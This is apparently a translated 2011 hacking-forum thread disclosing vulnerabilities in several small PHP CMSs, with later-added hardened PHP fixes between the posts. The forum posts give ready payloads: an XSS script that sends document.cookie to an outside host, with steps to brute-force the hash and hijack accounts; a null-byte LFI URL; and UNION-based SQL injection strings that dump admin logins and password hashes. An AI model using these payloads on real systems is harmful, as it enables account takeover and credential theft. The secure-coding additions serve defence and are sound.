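// Type is decided from the file content and mapped to a fixed extension; the
// client-supplied name never influences where, or as what, the file is stored.
const ALLOWED_AUDIO = [
    'audio/mpeg'  => 'mp3',
    'audio/ogg'   => 'ogg',
    'audio/x-wav' => 'wav',
];
const MAX_AUDIO_BYTES = 20 * 1024 * 1024;

/**
 * Validate and store one entry of $_FILES. Returns the generated storage name;
 * throws on any failure instead of copying whatever arrived.
 */
function storeAudioUpload(array $file, int $userid, PDO $pdo, string $uploadDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > MAX_AUDIO_BYTES) {
        throw new RuntimeException('file too large');
    }

    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime === false || !array_key_exists($mime, ALLOWED_AUDIO)) {
        throw new RuntimeException('unsupported media type');
    }

    // Random, unguessable name with an allow-listed extension: there is no
    // md5(name)_name.php style path that a visitor can compute and then request.
    $storedName = bin2hex(random_bytes(16)) . '.' . ALLOWED_AUDIO[$mime];
    $dest = rtrim($uploadDir, '/') . '/' . $storedName;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640); // readable by the application, never executable

    // The original name is kept as display data only and bound as a parameter, so
    // neither quotes in it nor $userid are ever spliced into the SQL text.
    $stmt = $pdo->prepare(
        'INSERT INTO AUDIO_FILES (user_id, file_name, stored_name, created, approved)
         VALUES (:uid, :fname, :sname, UNIX_TIMESTAMP(), :approved)'
    );
    $stmt->execute([
        ':uid'      => $userid,
        ':fname'    => substr(basename((string) $file['name']), 0, 255),
        ':sname'    => $storedName,
        ':approved' => 'N',
    ]);

    return $storedName;
}
```

Serving the stored files through a download script that sets Content-Disposition, rather than by direct URL, keeps the storage directory out of the web root entirely.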
04.08.2011, 13:00
Guest
Posts: n/a
Time on forum: 4100
Reputation: 74
SVCMS beta 1 (stealing cookies)
Another engine not without its quirks...
The mega coders of this engine issue the following cookies on login:
Code:
__qca=P0-464638314-1305237775445; crocmint_aff=697b75;
POSTAff2Cookie=697b75_137d839c;
POSTAff2TimeCookie=1305037573_1308127486_7;
POSTAff2ClickCookie=d9913101; PAPR_0=1305557527_http%253A//temp/;
SVCMS_userid=1;
SVCMS_md5passwd=e5c72dd4eca5301feca1bb0985eed55f;
SVCMS_randomstring=13123908414e397eb92e187;
PHPSESSID=bmkmssmcvtbcoreee5uqj49vp6
we see this here (user.php):
PHP code:
.....
 * Set the cookies
 */
private function set_login_cookies($logout = false) {
    $expire_val = ( ($logout) ? (time() - 30) : time() + 1209600); // 1209600 is two weeks
    $randomstring = uniqid(time());
    $md5_pass = md5($this->data['password'] . $randomstring);
    $cookies = array(
        'SVCMS_userid' => $this->data['userid'],
        'SVCMS_md5passwd' => $md5_pass,
        'SVCMS_randomstring' => $randomstring,
    );
    foreach($cookies as $cookie => $cookie_value) {
        setcookie($cookie, $cookie_value, $expire_val, '/', '');
    }
    return true;
}
.........
And on top of that, they left an active XSS in the comments!
That is:
Code:
img = new Image(); img.src = "http://day.mne/svoi.kuki?ciuda="+document.cookie;
-> Grab the id and the hash, as well as $_SERVER['HTTP_REFERER']
-> brute-force the hash (md5)
-> go back to $_SERVER['HTTP_REFERER']
-> look up the nick by id (the link on the commenter's nick)
-> act according to your conscience
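Added example, not SVCMS code: what set_login_cookies() from the post above should have done. The cookie carries only a random opaque token (nothing derived from the password, so a stolen cookie gives nothing to brute-force offline), the token is stored hashed server-side, and HttpOnly keeps it out of document.cookie, which is what the XSS above reads. Assumptions: $pdo is a PDO connection, a hypothetical table login_tokens(user_id, token_hash, expires) exists, and PHP is 7.3 or newer for the setcookie() options array.

```php
<?php
// Added example, not SVCMS code. Assumes $pdo (PDO) and a hypothetical table
// login_tokens(user_id, token_hash, expires); PHP >= 7.3 for setcookie() options.

declare(strict_types=1);

const LOGIN_TTL = 1209600; // two weeks, same lifetime as the original cookies

/** Issue a login cookie that is unrelated to the password. */
function issueLoginCookie(PDO $pdo, int $userid): void
{
    $token   = bin2hex(random_bytes(32)); // 256-bit random value, seen only by the client
    $hash    = hash('sha256', $token);    // only the hash is stored; a DB leak gives no tokens
    $expires = time() + LOGIN_TTL;

    $stmt = $pdo->prepare(
        'INSERT INTO login_tokens (user_id, token_hash, expires) VALUES (:uid, :hash, :exp)'
    );
    $stmt->execute([':uid' => $userid, ':hash' => $hash, ':exp' => $expires]);

    setcookie('SVCMS_login', $token, [
        'expires'  => $expires,
        'path'     => '/',
        'secure'   => true,   // never sent over plain HTTP
        'httponly' => true,   // not readable by script, so document.cookie does not expose it
        'samesite' => 'Lax',
    ]);
}

/** Return the user id for a valid, unexpired token, or null. */
function userFromLoginCookie(PDO $pdo): ?int
{
    $token = $_COOKIE['SVCMS_login'] ?? '';
    if (preg_match('/\A[0-9a-f]{64}\z/', $token) !== 1) {
        return null; // wrong shape, do not even hit the database
    }
    $stmt = $pdo->prepare(
        'SELECT user_id FROM login_tokens WHERE token_hash = :hash AND expires > :now'
    );
    $stmt->execute([':hash' => hash('sha256', $token), ':now' => time()]);
    $uid = $stmt->fetchColumn();
    return $uid === false ? null : (int) $uid;
}

/** Comment bodies are data: escape on output so a stored script tag never runs. */
function renderComment(string $body): string
{
    return '<p>' . htmlspecialchars($body, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}
```

On logout the row in login_tokens is deleted and the cookie expired, so a previously captured token stops working instead of living on for two weeks.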
05.08.2011, 00:28
Guest
Posts: n/a
Time on forum: 4100
Reputation: 74
MMO Games CMS 1.2 Final [shell upload]
(apparently a Lineage-type engine)
There is a file with a function that updates a record in the 'accounts' table (specifically, the avatar URL field)
functions.php
PHP code:
    allow = false;
    $sqlQuery = "SELECT `login`, `password` FROM `accounts` WHERE `login` = '$username'";
    if(($records = mysql_query($sqlQuery)) !== false) {
        $password = base64_encode(pack("H*", sha1(utf8_encode($password))));
        $row = mysql_fetch_object($records);
        if($password == $row->password) {
            $_SESSION['UserID'] = $row->login;
            header("location: index.php");
        }
    }
}
UserIDCheck($_POST['UserID'], $_POST['Password']);
}
if(isset($_GET['update']) && $_GET['update'] == "avatarurl") {
    $avatarURL = safe($_POST['avatarURL']);
    mysql_query("UPDATE `accounts` SET `avatar`='$avatarURL' WHERE `login`=' .$_SESSION['UserID'] . '");
}
# L2jEXODUS's CUSTOM MODDIFICATIONs - :::: END ::::
#------------------------------------------------------------------------------
?>
And if you send in a POST request (to site.com/index.php?update=avatarurl) the single parameter avatarURL with the value
then you can get a fully working shell...
path_to_root - site.com/includes/sidemenu.php
13.08.2011, 13:07
Newbie
Registered: 15.05.2010
Posts: 0
Time on forum: 2268
Reputation: 0
Fapos CMS 1.1.8 (latest version)
1. SEF URL bypass
.htaccess:
Code:
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php?url=$1 [QSA,L]
The SEF URL handling can be bypassed (which helps in exploiting GET vulnerabilities). The SEF URL itself, of course, goes through a filter:
PHP code:
if(!preg_match('#^[\#/\?&_\-=\.а-яa-z0-9]*$#ui', urldecode($_SERVER['REQUEST_URI'])))
...
?>
which lets a \n through at the end of the string
2. LFI
Dependencies: MQ=off, the URL check for SQL-inj disabled, the binary-unsafe is_file function and include_once.
File: index.php
PHP code:
if (!isset($_GET['url'])) {
    ...
} else {
    $pathParams = explode('/', $_GET['url']);
    foreach ($pathParams as $key => $value) {
        if (empty($value)) unset($pathParams[$key]);
    }
}
if (empty($pathParams)) {
    ...
}
//may be i need upgrade this...hz
if (count($pathParams) == 1 && preg_match('#^\d+$#', $pathParams[0])) {
    ...
} else if (count($pathParams) == 0) {
    ...
}
foreach ($pathParams as $key => $val) {
    $pathParams[$key] = trim($val);
}
return $pathParams;
...
$this->callAction($pathParams);
... //function callAction($params)
if (!is_file('modules/' . strtolower($params[0]) . '/index.php')) {
    ...
}
include_once 'modules/' . strtolower($params[0]) . '/index.php';
Regular slashes cannot be used, but apart from them there are plenty of other ways to exploit the LFI: http://wfuzz.googlecode.com/svn-history/r2/trunk/wordlist/vulns/dirTraversal-nix.txt
The rest of the CMS code is scattered across modules (those would be module vulnerabilities).
Exploit: /?url=news\index.php%00h
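Added example, not Fapos CMS code: a hardened version of the REQUEST_URI filter and of the callAction() include from the post above. It shows why the original `$` anchor lets a trailing newline through (without the D modifier, `$` also matches just before a final "\n"), rejects null bytes before they reach is_file()/include_once, and restricts the module name to an allow-list so that neither "/" nor "\" can form a path. Assumes a modules/ directory next to the script; function names are hypothetical.

```php
<?php
// Added example, not Fapos CMS code. Assumes a modules/ directory next to this script.

declare(strict_types=1);

/**
 * The original pattern is '#^[...]*$#ui'. Without the D modifier, $ also matches
 * right before a trailing "\n", which is exactly what lets a newline through at the
 * end of the string. \z anchors at the true end of the subject, and the explicit
 * null-byte check stops %00 truncation in the file functions that run later.
 */
function isCleanRequestUri(string $uri): bool
{
    $decoded = urldecode($uri);
    if (strpos($decoded, "\0") !== false) {
        return false;
    }
    return preg_match('#\A[\#/\?&_\-=\.а-яa-z0-9]*\z#ui', $decoded) === 1;
}

/**
 * Resolve a module name to modules/<name>/index.php, or return null.
 * The name must match a strict allow-list (letters, digits, underscore), so "/",
 * "\", "." and null bytes can never reach the path, and the resolved path is then
 * checked to lie inside the modules directory.
 */
function resolveModuleIndex(string $name, string $modulesDir): ?string
{
    $name = strtolower($name);
    if (preg_match('/\A[a-z0-9_]{1,32}\z/', $name) !== 1) {
        return null;
    }
    $base = realpath($modulesDir);
    $path = realpath($modulesDir . '/' . $name . '/index.php');
    if ($base === false || $path === false) {
        return null;
    }
    // realpath() has already collapsed any traversal, so a prefix test proves containment
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

/** Route to a module only through the validated path. */
function callAction(array $params, string $modulesDir): void
{
    $index = resolveModuleIndex((string) ($params[0] ?? ''), $modulesDir);
    if ($index === null) {
        http_response_code(404);
        return;
    }
    include_once $index;
}

// Entry point: refuse the request before any routing if the URI is not clean.
if (!isCleanRequestUri($_SERVER['REQUEST_URI'] ?? '')) {
    http_response_code(400);
    exit;
}
```

With this in place, the exploit URL above fails twice: the null byte is rejected by isCleanRequestUri(), and "news\index.php" does not match the module-name pattern.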
15.08.2011, 17:51
Guest
Posts: n/a
Time on forum: 4100
Reputation: 74
ExpCMS blind sql-inj
PHP code:
 * @copyright Copyright (C) 2003 Piotr Usewicz
 * @access public
 * @package ExpCMS
 * @subpackage Auth
 */
class Auth
{
    /**
     * AuthStart: Used for initializing main functions for auth
     * @access public
     */
    function AuthStart()
    {
        global $_EXPCMS;
    } // end func AuthStart()
    /**
     * Authenticate: Checks whether user name and password are valid
     * @access public
     * @param string User name
     * @param string User password
     * @return boolean True/False if authentication is ok/not ok
     */
    function Authenticate($user_name, $user_password)
    {
        global $_EXPCMS;
        if ( isset ($user_name) && isset ($user_password))
        {
            $result = $_EXPCMS->db->Execute("SELECT user_id, user_pass from " . $_EXPCMS->config->GetVar("Tables.Auth") . " where user_name = '$user_name'");
            if ($result === false)
            {
                RaiseError(__FILE__, __LINE__, "Error executing db query:" . $_EXPCMS->db->ErrorMsg() );
            }
            else
            {
                $user = $_EXPCMS->db->GetArray();
                // check if login is correct, if yes, save session variables
                if (md5($user_pass) == $user['user_pass'] )
                {
                    $_EXPCMS->session->SessionRegister("authenticated", 1);
                    $_EXPCMS->session->SessionRegister("user_name", $user_name);
                    $_EXPCMS->session->SessionRegister("user_pass", $user['user_pass'] );
                    $_EXPCMS->session->SessionRegister("user_id", $user['user_id'] );
                    // when authenticated
                    $_EXPCMS->session->SessionRegister("timestamp", time() );
                    // time since last action... used for session/auth timeout
                    $_EXPCMS->session->SessionRegister("idle", time() );
                    return true;
                }
                else
                {
                    return false;
                }
            }
        }
    } // end func Authenticate()
    /**
     * IsAuthenticated: Checks if user is authenticated
     * @access public
     * @param string User name
     * @return boolean Whether is or not authenticated
     */
    function IsAuthenticated($user_name)
    {
        global $_EXPCMS;
        // check if we got the session variables set
        if ($_EXPCMS->session->SessionIs("authenticated") && $_EXPCMS->session->SessionGet("authenticated") == 1)
        {
            return true;
        }
        else
        {
            return false;
        }
    } // end func IsAuthenticated()
    /**
     * SetIdle: Sets new idle time
     *
     * Used when user has performed an action. Refreshes the last action time.
     * When idle time is too long, session can be timed out.
     *
     * @access public
     * @param integer Optional - new idle time to add to current time
     */
    function SetIdle($time = 0)
    {
        global $_EXPCMS;
        if ($_EXPCMS->session->SessionIs("authenticated") && $_EXPCMS->session->SessionGet("authenticated") == 1 && $_EXPCMS->session->SessionIs("user_name") )
        {
            if ($time == 0)
            {
                $_EXPCMS->session->SessionRegister("idle", time() );
            }
            else
            {
                $_EXPCMS->session->SessionRegister("idle", time() + $time);
            }
        }
    }
}
?>
In the login field (if error output is enabled after all):
Code:
admin'+OR+'pwd'='pwd'+UNION+SELECT+group_concat(user_id,0x3a,user_pass+separator+0x3c62723e),2+from+gry_users+--
well, and if there is no output, then as a blind one (the fields and the table are there)
22.08.2011, 23:00
Learner
Registered: 02.01.2009
Posts: 90
Time on forum: 390073
Reputation: 44
Mu Online Advanced webshop alert(document.cookie)
On login, the login/password (md5) is written to cookies. Vulnerable code: inc/sajax.php
23.08.2011, 14:27
Guest
Posts: n/a
Time on forum: 4100
Reputation: 74
ottoman cms[SQL-Injection]
view.php
PHP code:
...
include 'header.php';
// Detect If User Is Logged In
if (empty($logged_in)) { $login_form = "form"; include 'login.php'; }
else {
    $id = $_GET['id'];
    $type = $_GET['type'];
    switch($type)
    {
        case article:
            // Top Menu
            echo "Article Viewer";
            $article_sql = mysql_query("SELECT * FROM articles WHERE id = '$id'");
            while($article = mysql_fetch_array($article_sql)){
                $article = new Article($article[id]);
                $article->show();
                echo " $article->article_name";
                if ($article->article_status == "private") { echo " [private]"; }
                if ($article->article_status == "draft") { echo " [draft]"; }
...
exploit:
Code:
http://temp/view.php?type=article&id=1+UNION+SELECT+1,group_concat(admin_user,0x3a,admin_pass+SEPARATOR+0x3c62723e),3,4,5,6,7+FROM+configuration+--
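Added example serving three posts in this thread (MMO Games CMS functions.php, ExpCMS Auth::Authenticate and ottoman cms view.php); it is not code from any of those projects. Each of those queries splices user input into the SQL text; below the same three are written with PDO prepared statements so the input is bound as data, with the ExpCMS unsalted md5 compare swapped for password_verify(). Assumptions: $pdo is a PDO connection set to ERRMODE_EXCEPTION, and table and column names follow the posts.

```php
<?php
// Added example, not ExpCMS / ottoman cms / MMO Games CMS code. Assumes $pdo is a PDO
// connection with PDO::ERRMODE_EXCEPTION; table and column names follow the posts above.

declare(strict_types=1);

/** ottoman cms view.php: the article id came straight from $_GET into the query. */
function fetchArticle(PDO $pdo, string $rawId): ?array
{
    if (!ctype_digit($rawId)) {   // ids are integers; anything else is rejected up front
        return null;
    }
    $stmt = $pdo->prepare('SELECT * FROM articles WHERE id = :id');
    $stmt->execute([':id' => (int) $rawId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** ExpCMS Auth::Authenticate: the user name was interpolated into the WHERE clause. */
function authenticate(PDO $pdo, string $authTable, string $userName, string $password): ?int
{
    // The table name comes from configuration, not the user, but identifiers cannot be
    // bound as parameters, so it is still restricted to a plain identifier.
    if (preg_match('/\A[A-Za-z0-9_]+\z/', $authTable) !== 1) {
        throw new InvalidArgumentException('bad auth table name');
    }
    $stmt = $pdo->prepare("SELECT user_id, user_pass FROM {$authTable} WHERE user_name = :name");
    $stmt->execute([':name' => $userName]);
    $user = $stmt->fetch(PDO::FETCH_ASSOC);
    // password_verify() expects a password_hash() value: salted, slow, and not
    // recoverable by the group_concat() trick once the column is dumped.
    if ($user === false || !password_verify($password, $user['user_pass'])) {
        return null;
    }
    return (int) $user['user_id'];
}

/** MMO Games CMS functions.php: avatar URL update keyed on the session login. */
function updateAvatar(PDO $pdo, string $login, string $avatarUrl): bool
{
    $parts = parse_url($avatarUrl);
    if ($parts === false || !in_array($parts['scheme'] ?? '', ['http', 'https'], true)) {
        return false;             // only absolute http(s) URLs are acceptable as an avatar
    }
    $stmt = $pdo->prepare('UPDATE accounts SET avatar = :url WHERE login = :login');
    $stmt->execute([':url' => $avatarUrl, ':login' => $login]);
    return $stmt->rowCount() === 1;
}
```

The avatar value is also data when it is rendered, so the template that prints it still needs htmlspecialchars(); binding it here only closes the SQL side.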